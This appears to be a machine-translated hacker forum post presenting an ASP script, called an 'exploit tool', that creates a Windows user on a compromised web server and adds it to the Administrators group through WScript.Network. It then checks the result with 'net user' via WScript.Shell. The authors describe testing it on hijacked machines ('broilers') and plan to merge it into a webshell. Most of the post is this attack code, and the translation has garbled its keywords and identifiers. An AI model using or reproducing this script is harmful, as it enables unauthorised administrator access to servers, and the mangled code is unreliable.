Es wurde der .asp -Code des Superbenutzers hinzugefügt [Original von Blue Screen, Kevin Improvement, MS unveröffentlichte Verwundbarkeit]
Autor: Blue Screen, Kevins Artikel Quelle: Gefrierpunkt extrem
Eigentlich haben Kevin und ich es letzte Woche auf meinem Broiler getestet und Hippo -Epos. Das Ergebnis war, dass Benutzer der Administratorengruppe erfolgreich unter Benutzerberechtigungen hinzugefügt wurden (obwohl ich meinen Augen nicht glauben kann).
Das letzte Mal, als Kevin nichts gesagt hat, habe ich es nicht gewagt, es zu posten ... jetzt sah ich, wie er es in seinem Blog veröffentlichte, also habe ich es übertragen (es war ein bisschen besser als als ich es letztes Mal getestet habe, und ich habe ein Formular hinzugefügt). Jetzt habe ich Glück für alle `` `
Wie auch immer, der Code ist korrekt, aber es gelingt selten, es hängt vom Glück ab. . Haha, nächster Schritt möchte ich ihn in den Ozean integrieren. Hey-hey.
Die Codekopie lautet wie folgt:
<Head> .Network -Objekt -Skript -Berechtigung zur Verbesserung von Exploit -Tool </head>
<formaction = "userAdd.asp" methode = post>
Benutzer: <inputName = "userername" type = "text" value = "kevin1986"> <br>
Passwort: <inputName = "passwd" type = "password"> <br>
<inputType = "surug" value = "add">
</form>
<%@Codepage = 936
onErrorresumeNext
IFREQUEST.SERVERVARIABLES ("remote_addr") <> "127.0.0.1" dann
Antwort.Write "IP! Sn0Tright"
anders
IFREQUEST ("Benutzername") <> "" dann
Benutzername = Anfrage ("Benutzername")
Passwd = Request ("Passwd")
Response.expires = 0
Sitzung.Timeout = 50
Server.scripttimeout = 3000
setLp = server.createObject ("wscript.network")
oz = "winnn: //" & lp.computername
SetOb = getObject (oz)
Setoe = getObject (oz & "/administratoren, gruppe")
Setod = ob.create ("Benutzer", Benutzername)
OD.SetPasswordPasswd
OD.SetInfo
OE.Addoz & "/" & Benutzername
Isterrthen
Antwort. Schreiben Sie "Hey ~~ Sie sollten heute nicht 6+1 kaufen ... es ist besser, 2 Yuan zu sparen, um eine Flasche Cola zu kaufen ..."
anders
IFInStr (server.createObject ("wscript.shell"). exec ("cmd.exe/cnetuser" & username.stdout.readall), "Last Login")> 0Then
Antwort.Write "Obwohl es keinen Fehler gibt, scheint es nicht erfolgreich festzulegen.
anders
Antwort.Write "omg!" & Usustername & "Account wurde tatsächlich! Dies ist eine unbekannte Lücke. 5.000.000 RMB gehört Ihnen."
Endif
Endif
anders
Antwort.Write "Bitte geben Sie den Benutzernamen ein"
Endif
Endif
%>